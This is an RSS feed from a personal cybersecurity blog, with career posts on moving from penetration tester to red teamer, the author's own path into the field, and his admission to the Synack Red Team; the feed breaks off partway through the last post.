<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Flaviu Popescu]]></title><description><![CDATA[Thoughts, stories and ideas.]]></description><link>https://flaviu.io/</link><image><url>https://flaviu.io/favicon.png</url><title>Flaviu Popescu</title><link>https://flaviu.io/</link></image><generator>Ghost 4.48</generator><lastBuildDate>Tue, 23 Jun 2026 19:33:00 GMT</lastBuildDate><atom:link href="https://flaviu.io/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[From Pentester to Red Teamer: Navigating the Skills Needed for the Transition]]></title><description><![CDATA[<p>If you&apos;re already in the cybersecurity field or looking to break in, you&apos;ve probably noticed that the industry is constantly shifting. It&apos;s an endless game of cat and mouse between defenders and attackers. 
Many cybersecurity professionals start their journey as penetration testers (pentester), tasked</p>]]></description><link>https://flaviu.io/from-pentester-to-red-teamer-navigating-the-skills-needed-for-the-transition/</link><guid isPermaLink="false">6720f4d29fbe8f3c5b3f5429</guid><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Wed, 30 Oct 2024 07:00:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1522426266214-ec2d2abb9ce0?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDEwfHxqb3VybmV5fGVufDB8fHx8MTczMDIzMTEyOHww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1522426266214-ec2d2abb9ce0?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDEwfHxqb3VybmV5fGVufDB8fHx8MTczMDIzMTEyOHww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" alt="From Pentester to Red Teamer: Navigating the Skills Needed for the Transition"><p>If you&apos;re already in the cybersecurity field or looking to break in, you&apos;ve probably noticed that the industry is constantly shifting. It&apos;s an endless game of cat and mouse between defenders and attackers. Many cybersecurity professionals start their journey as penetration testers (pentester), tasked with identifying vulnerabilities in networks, systems, or applications. But for those looking to move from finding holes in security to simulating real adversarial attacks, the jump to red teaming is a big one.</p><p>It&apos;s not just a &#x201C;level up&#x201D;, it&apos;s a mindset shift, a deeper technical dive, and a move into a role that looks at security from every angle.</p><hr><h3 id="pentester-vs-red-teamer-whats-the-difference"><strong>Pentester vs. Red Teamer: What&apos;s the Difference?</strong></h3><p>As a <strong><em>Pentester</em></strong>, your main focus is on identifying vulnerabilities in a controlled, often isolated, environment. 
You typically work through a structured process, using a well-defined methodology like OWASP for web applications or other vulnerability frameworks. The aim is to highlight weaknesses and deliver specific recommendations to improve security. This means pentesters are very methodical, targeting specific systems or applications for a focused assessment.</p><p>In contrast, a <strong><em>Red Teamer</em></strong> operates more like a real-world adversary. Instead of finding vulnerabilities, you&apos;re simulating actual attack scenarios to understand how far an attacker could get and how well an organisation can detect and respond. It&apos;s not just technical systems you&apos;re assessing, but their full defensive posture, including people, processes, and detection capabilities. Red teaming requires pentesting skills but adds in a whole other layer: you&apos;re emulating threats, using adversary tactics, and focusing on stealth to see if you can fly under the radar.</p><h3 id="how-a-pentesters-skillset-evolves-for-red-teaming"><strong>How a Pentester&apos;s Skillset Evolves for Red Teaming</strong></h3><p>Many red teamers start with a strong penetration testing background, so the jump to red teaming builds on those foundational skills. Here&apos;s how key skills evolve from pentesting to red teaming:</p><h4 id="1-exploitation-techniques-basic-to-advanced"><strong>1. Exploitation Techniques: Basic to Advanced</strong></h4><p><strong>Pentester</strong>: As a pentester, you&apos;re comfortable with common exploitation techniques, usually leveraging tools like Metasploit or Burp Suite to uncover and exploit web or network vulnerabilities.</p><p><strong>Red Teamer</strong>: In red teaming, the game changes. You&apos;re moving into more advanced exploitation, covering a wider range of systems and techniques. 
Tools like Cobalt Strike are essential, and you&apos;ll be simulating sophisticated attacks, including advanced payloads and lateral movement tactics to mimic high-level threats.</p><h4 id="2-command-and-control-c2-frameworks-building-persistence"><strong>2. Command and Control (C2) Frameworks: Building Persistence</strong></h4><p><strong>Pentester</strong>: In pentesting, persistence isn&apos;t always a priority. You find a vulnerability, exploit it, and report the results.</p><p><strong>Red Teamer</strong>: Persistence is critical. You&apos;re establishing and maintaining C2 communications while evading detection, much like real-world attackers. Familiarity with frameworks like Mythic and Posh C2 enables you to test defenses and remain hidden, mimicking the stealth and persistence of sophisticated threat actors.</p><h4 id="3-adversary-emulation-beyond-finding-vulnerabilities"><strong>3. Adversary Emulation: Beyond Finding Vulnerabilities</strong></h4><p><strong>Pentester</strong>: Your focus is on vulnerabilities - identifying and exploiting them in a technical, structured approach.</p><p><strong>Red Teamer</strong>: Red teaming means stepping into an attacker&apos;s shoes. You&apos;re no longer just finding vulnerabilities, you&apos;re emulating the behavior of threat actors. Frameworks like MITRE ATT&amp;CK become essential, letting you build scenarios that test the full extent of an organisation&#x2019;s detection and response.</p><h4 id="4-social-engineering-techniques-expanding-the-attack-surface"><strong>4. Social Engineering Techniques: Expanding the Attack Surface</strong></h4><p><strong>Pentester</strong>: Pentesting is usually limited to technical testing and doesn&apos;t often include social engineering, though phishing simulations might sometimes be included.</p><p><strong>Red Teamer</strong>: Red teaming takes on social engineering in full force. 
Phishing, pretexting, or even physical intrusion are tactics you&apos;ll employ, testing an organisation&apos;s human defenses along with its technical controls.</p><h4 id="5-reporting-and-communication-skills-tailoring-the-message"><strong>5. Reporting and Communication Skills: Tailoring the Message</strong></h4><p><strong>Pentester</strong>: As a pentester, your reports focus on technical findings and remediation steps for each identified vulnerability. Clear communication is important but typically stays within technical teams.</p><p><strong>Red Teamer</strong>: For a red teamer, reporting is more strategic and narrative-based. You&apos;re documenting attack paths, impact, and the organisation&apos;s response gaps. This means translating technical jargon into clear risks and actions for both technical and executive audiences, offering insights that help teams strengthen security holistically.</p><h3 id="soft-skills-and-mindset-the-core-of-red-teaming"><strong>Soft Skills and Mindset: The Core of Red Teaming</strong></h3><p>For both roles, technical expertise is vital, but moving into red teaming means enhancing your soft skills too. Communication, collaboration, and a proactive, strategic mindset are key. Red teamers work closely with different stakeholders, often mentoring junior staff and contributing to broader security awareness. These skills are what help bridge the gap between finding vulnerabilities and building an organisation-wide defensive posture.</p><h3 id="from-pentester-to-red-teamer-embracing-the-challenge"><strong>From Pentester to Red Teamer: Embracing the Challenge</strong></h3><p>Transitioning from pentesting to red teaming is an exciting and challenging move that broadens your view of cyber security. By building on the technical skills of a pentester and developing a strategic, adversary-focused mindset, you&apos;re positioning yourself to make a real impact in an organisation&apos;s security. 
Red teaming isn&apos;t just a job, it&apos;s a commitment to <em>pushing defenses to their limit</em> and ensuring resilience against real-world threats.</p><p>If you&apos;re ready to take on this challenge, embrace the complexity and step confidently into a role where you&apos;ll learn, adapt, and continuously test your mettle. The journey from pentester to red teamer is one of growth, resilience, and an ever-deepening understanding of security.</p><p>So dive in and start exploring, you&apos;re in for a rewarding, dynamic career that&apos;s anything but ordinary.</p>]]></content:encoded></item><item><title><![CDATA[Penetration Tester Interview Questions Guide]]></title><description><![CDATA[Penetration Tester Interview Questions Guide]]></description><link>https://flaviu.io/penetration-tester-interview-questions-guide/</link><guid isPermaLink="false">671ac0bfc03bbe1a70e5094c</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[Getting Started]]></category><category><![CDATA[learning]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Fri, 25 Oct 2024 12:14:53 GMT</pubDate><content:encoded/></item><item><title><![CDATA[Stepping into Cyber - My Story]]></title><description><![CDATA[<p>Because &quot;<strong>Breaking into Cyber</strong>&quot; is overrated. 
:)</p><hr><p>Anyone with a LinkedIn profile and interested in the Cyber security industry would have come across a post with a statement such as &apos;How do I find an entry level role in Cyber security&apos; and more often than not, the</p>]]></description><link>https://flaviu.io/stepping-into-cyber-my-story/</link><guid isPermaLink="false">65463f58a5405f0539236075</guid><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 29 Jan 2024 12:00:00 GMT</pubDate><media:content url="https://flaviu.io/content/images/2024/01/irc.PNG" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2024/01/irc.PNG" alt="Stepping into Cyber - My Story"><p>Because &quot;<strong>Breaking into Cyber</strong>&quot; is overrated. :)</p><hr><p>Anyone with a LinkedIn profile and interested in the Cyber security industry would have come across a post with a statement such as &apos;How do I find an entry level role in Cyber security&apos; and more often than not, the reply in the comments section is <strong><em>&apos;Cyber security is not an entry level job&apos;</em></strong>. Some argue that there are always ways to enter the industry such as undertaking an IT help desk job and others will say that there are entry-level roles, such as junior or apprentice (they&apos;re just few and far between). As someone who did neither, I thought I would share my own experience with landing that first role as a mid-level Penetration Tester in the industry.</p><p>My background has been very much learn what you can from where you can. This journey of self learning started from a very young age. Malcolm Gladwell said it takes 10,000 hours to learn a new skill, however recently Josh Kaufman disproved this theory stating that it takes 20 hours not 10,000. I am by no means saying you can learn cyber security in 20 hours, maybe just not as many as 10,000. 
When someone asks me what it takes to land a job in cyber the answer is passion <strong><em>(more passion, more energy)</em></strong>; you may be rolling your eyes and thinking clich&#xE9; but it&apos;s true. Cyber security, no matter what the role, is a rabbit hole deeper than you can ever imagine. You have to have the passion and interest to engage in the subject and tumble down that rabbit hole faster than Alice.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="2812" height="2812" srcset="https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by Meghan Hessler</figcaption></figure><p>Back in the early 
2000s my teenage years were spent in my room on the computer but back then there weren&apos;t so many social media platforms like Twitter (X), Facebook, TikTok; it was internet relay chat (IRC) and that&apos;s where I became interested in Cyber and the possibilities that it posed. Of course, at that age it&apos;s not the security side that interests you as the chat groups were commandeered by Black Hat hackers; in a way as a young teenager it was like being in a room full of grown-ups talking about things kids shouldn&apos;t hear, and I was there hiding in the darkness of the chatroom, invisible, listening.</p><p>That was where I learned about security vulnerabilities, what they were and how to exploit them, which is what others seemed to be doing, on a mass scale and for fun at that. I also learned how to secure vulnerabilities as when a hacker got hold of a server, they wanted to secure it and protect it from other hackers; this double-sided sword taught me the basis and fundamentals of Cyber security just not in the traditional sense.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="5864" height="3922" srcset="https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, 
https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by Joshua Woroniecki</figcaption></figure><p>Growing up in Romania we didn&apos;t have access to as much as other Western countries, so I spent most of my time online and for years that is what I did. I quickly learned various sides of Cyber security, and my love for Linux terminals was set in stone. I travelled to several countries such as Spain, Greece, Germany where I resided for several years but wherever I went so did my computer (and internet connection, however stable) enabling me to have one foot in the virtual world no matter where in the world I was.</p><p>You&apos;re always told that if you want a career you need an education. Be that in the form of a college Diploma or University Degree. I chose the latter. I will admit the only reason that I went to university was for a job. For me university wasn&apos;t stimulating as what we were being taught I already knew; I was for the most part going through the motions. My real cyber education was at home, doing what I did best, learning on my own.</p><p>Hungry in my quest for knowledge I was on every platform you could imagine. Try Hack Me wasn&apos;t as challenging, so I tried Immersive Labs and then Hack the Box. This is where I obtained Guru level, top 10 UK and top 50 Worldwide. 
The novelty of solving challenges soon wore off and I was ready to experience real world vulnerabilities.</p><p>Vulnerability disclosure programs are fantastic: companies allow testers to test their web applications, external infrastructure and disclose anything they may find. I started doing disclosures for the top companies and organisations in the world, however it is very easy to step over the line and this can become problematic. You may ask yourself, why? Well, because it&apos;s very easy to step out of scope and wander into areas that are not part of the vulnerability disclosure program.</p><p>I loved the real work experience and wanted to continue, and for that I joined Synack (SRT). I feel the combination of the three is what ultimately landed me my first role as a Cyber Security Consultant (Penetration Tester).</p><p>Try Hack Me paved the way for Hack The Box and Hack The Box helped with passing Synack&apos;s vetting process. Synack is where I gained some real world experience. In my opinion, some of the best penetration testers or red teamers come from a bug bounty and black hat background. This is because they have a different way of thinking. It takes a creative and infinitely curious mind to figure out new ways to break into a system, bypass security mechanisms, or use known vulnerabilities in novel ways. This is particularly true since the obvious ways into a system are undoubtedly blocked first.</p><p>While creativity is undeniably vital in hacking, it doesn&apos;t stand alone as the sole mental attribute ensuring success. In reality, there&apos;s a distinct trait that sets accomplished hackers apart from the less skilled.</p><p>That crucial attribute is systemising, or the ability to build systems and understand them. 
As per <a href="https://www.sciencedaily.com/releases/2016/06/160601111353.htm" rel="noopener noreferrer">research</a> in Frontiers in Human Neuroscience, a positive correlation exists between systemising and general hacking skills. This correlation frequently leads to a comprehensive grasp of systems extending beyond those confined to computers. For hackers, mastering this trait is of paramount importance.</p><p>Synack and other bug bounty platforms can enable you to test your skills on real world organisations and gain experience. I spent a month getting used to their processes and submitted several vulnerabilities for which I got paid almost instantly. Going through this process also taught me the importance of staying within the scope of a program to precision and writing high quality reports showing the risks posed to the organisation. I would also say that writing blogs helped, this may seem insignificant, but blogs are becoming more like portfolios of work rather than Dear Deirdre. When you have to explain to an audience you have to know the ins and outs of the subject to a high level. This became home to all the vulnerability disclosures I completed and articles relating to interesting finds. I often notice job seekers struggle to land a job in Cybersecurity because they don&apos;t have experience. 
You just have to find your own way to showcase your skills to a potential employer and by this increase your chances of getting employed.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="3000" height="2000" srcset="https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by SpaceX</figcaption></figure><p>Believe it or not this article was meant to be about my first two years as a Consultant in Cyber Security (Penetration tester), but as you have read it turned out more about my journey and landing a full-time Cybersecurity Consultant job with no prior experience or certificates other than what I&apos;ve discussed above.</p><p>Last words of wisdom, please don&apos;t set up your LinkedIn profile the day after you graduate. 
Network, share your knowledge, and so on &#x2013; long before you&apos;re ready to look for a job.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="5955" height="3350" srcset="https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by Marc-Olivier Jodoin</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thanks for reading my article, until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Synack Red Team Member]]></title><description><![CDATA[Bug bounty programs were created 10-15 years ago by companies like Google, Mozilla, Facebook; they were basically created to help them uncover the security vulnerabilities that would ultimately lead to a major data breach. ]]></description><link>https://flaviu.io/synack-red-team-member/</link><guid isPermaLink="false">60f14d8ae056bf37bb0e6ff1</guid><category><![CDATA[bugbounty]]></category><category><![CDATA[cybersecurity]]></category><category><![CDATA[offensivesecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Sun, 12 Sep 2021 18:51:00 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/09/syn.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2021/09/syn.jpg" alt="Synack Red Team Member"><p>I&apos;m glad to share that I am finally a member of <a href="https://www.synack.com/red-team/">Synack Red Team</a>. My actual official joining date is 26/8/2021. It was a long process but very satisfying in the end. Tune in if you would like to know more about the journey!</p><blockquote><strong>Theodore Roosevelt</strong>: Nothing worth having comes easy.</blockquote><hr><p><em>This article is not sponsored by Synack or HackTheBox.</em></p><h3 id="introduction">Introduction</h3><hr><p>Bug bounty programs were created 10-15 years ago by companies like Google, Mozilla, Facebook; they were basically created to help them uncover the security vulnerabilities that would ultimately lead to a major data breach. 
They opened up their environments to the world and said: &quot;If you are able to find a vulnerability in one of our environments we will pay you, and we will pay you based on the impact and severity of that vulnerability.&quot;</p><h3 id="about-synack">About Synack</h3><hr><p>As Jay Kaplan, Cofounder &amp; CEO of Synack, said &quot;Synack is the company that the world&apos;s largest corporations and government agencies turn to in order to rid their applications and networks of critical vulnerabilities. Their customers range from the largest global 2000 companies, the world&apos;s leading banks, retailers, and health care organisations; they represent over a trillion dollars in assets, as well as major federal agencies including the dept. of defence, dept. of energy, health and human services; they work with 18 different federal agencies today. They leverage a network of over 1500 of the most elite ethical hackers from 82 countries who are on the hunt for potentially fatal vulnerabilities while utilising technology to make those hackers smarter and infinitely more skillable.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-10.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1687" height="1457" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-10.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-10.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image-10.png 1600w, https://flaviu.io/content/images/2021/07/image-10.png 1687w" sizes="(min-width: 720px) 720px"><figcaption>Synack logo Src: Synack</figcaption></figure><p>The word <strong>hacker</strong> [ <strong>hak</strong>-er ] traditionally has carried a pretty negative connotation and people generally think of a hacker as a person wearing a hoodie, sitting in their parents&apos; dark basement and hacking by night and sleeping during the day. 
The reality is most of these really good hackers are true professionals; they have normal 9 to 5 jobs working at some of the biggest companies in the world. The way we perceive them vs the way they look in reality is sometimes different.</p><p>There are several hackers that have passed the million dollar mark with Synack in terms of total money taken home over the past several years, so the ability to earn a substantial amount of money is real. Some hackers may earn several hundred dollars for finding low-hanging-fruit vulnerabilities or even completing &quot;a mission&quot;, as they call it at Synack, which is a task set up by Synack for researchers: they pick the mission and, once completed, they will be paid for it.</p><p>An example of a mission: it could be looking for Cross-site scripting within the scope that they provide.</p><p>They will pay based on the category of the issue that the researcher finds and the data that is ultimately exposed; all of that is fed into a calculation to determine how much to pay the security researcher. Some people have shifted from their normal daily jobs to work full time on Synack.</p><p>Synack is kind of the Uber for Cyber Security with a lot more security controls in place; they aren&apos;t about big numbers of researchers, they are about the best of the best, that&apos;s why they have a 10% acceptance rate of who they take into their community. They are really focused on people who are productive; they actively manage their community and make sure that those who are working with them are productively finding vulnerabilities and providing vulnerabilities to their customers.&quot;</p><h3 id="srt-member-s-statements">SRT Member&apos;s Statements</h3><hr><p>Jennifer Villareal, Ethical Hacker at Synack, said &quot;If you are a person who would rather not sit around and watch movies, if you&apos;d rather be participating in something puzzle-like, and learning something that can make you money. 
People&apos;s privacy and national security may also be good motivation.&quot;</p><p>Jonnathan Villareal, Ethical Hacker at Synack, said &quot;It&apos;s the coolest thing ever to hack and get paid for it, and of course not going to jail is a huge plus too.<br>The satisfaction of knowing that you contributed to making something secure, if you can&apos;t break it and some of the best hackers can&apos;t break it today, means that people relying on these services can use them reliably and securely and there is a bit of pride to that as well.&quot;</p><p>Cyber criminals are hiding hard during the Covid19 pandemic and the crowdsourced security testing model is essential for helping these organisations defend themselves especially when traditional security teams can&apos;t even get into the office.</p><p>Cyber Security is one of these industries where companies have been very sensitive and been against the idea of remote work but obviously that is changing in a big way today.</p><p>Right now companies are trying to push new environments, new applications, new websites as fast as they can so they need a solution that allows them to thoroughly test these environments in a highly rapid manner.</p><h3 id="how-synack-gets-the-world-best-ethical-hackers">How Synack gets the world&apos;s best ethical hackers</h3><hr><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-13.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1054" height="354" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-13.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-13.png 1000w, https://flaviu.io/content/images/2021/07/image-13.png 1054w" sizes="(min-width: 720px) 720px"><figcaption>Synack Src: Synack</figcaption></figure><p>Earning a spot on the Synack Red Team (SRT) is a pinnacle achievement in the career of the world&apos;s best security researchers; Synack has the strictest entrance criteria 
in the industry. Synack keeps average hackers out; even many above-average hackers won&apos;t make it to the SRT. Uniquely, Synack also removes SRT members every year, so companies aren&apos;t exposed to ineffective testers, a protection bug bounty platforms don&apos;t offer. This way their customers get the best of the best. SRT members are incentivised to find unknown, high-severity vulnerabilities in their customers&apos; systems before those vulns cause problems for the business. The SRT uses Synack&apos;s platform to narrow in on critical vulnerabilities that other solutions struggle to find; with Synack&apos;s proprietary scanning technology they can be more efficient than unassisted hackers seeking bug bounties on other platforms. Synack testing is also safer for companies, with constant measurement, analytics and monitoring. Synack motivates SRT members to do their best hacking with a Hall of Honour, the &quot;<strong><a href="https://acropolis.synack.com/">Synack Acropolis</a></strong>&quot;, and keeps motivating them as they climb the ranks. Finally, to attract talent, there are opportunities to travel, adventure and hack for Synack at destination events, all to protect their customers around the world.</p><h3 id="about-the-journey">About the Journey</h3><hr><h3 id="entry-point-1">Entry Point 1</h3><p>There are two main ways to join the SRT: through their main website, or through Hack The Box tracks. The power behind the Synack platform is an elite team of the world&apos;s top cybersecurity researchers&#x2014;drawn from over 80 countries, recruited for their skill, and chosen based on trust. &#xA0;(<a href="https://boards.greenhouse.io/synacksrt/jobs/150860?ref=synack">Apply</a>). 
You will have to fill in a form with as much information as possible to show Synack your worth; this includes:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-14.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="770" height="433" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-14.png 600w, https://flaviu.io/content/images/2021/07/image-14.png 770w" sizes="(min-width: 720px) 720px"><figcaption>Entry Points</figcaption></figure><!--kg-card-begin: markdown--><p>Bug bounty experience (public / private) <em>must list any public profile links</em><br>
Job descriptions with detailed responsibilities<br>
Relevant industry certifications<br>
Industry/conference speaking experience<br>
Any attributed CVEs</p>
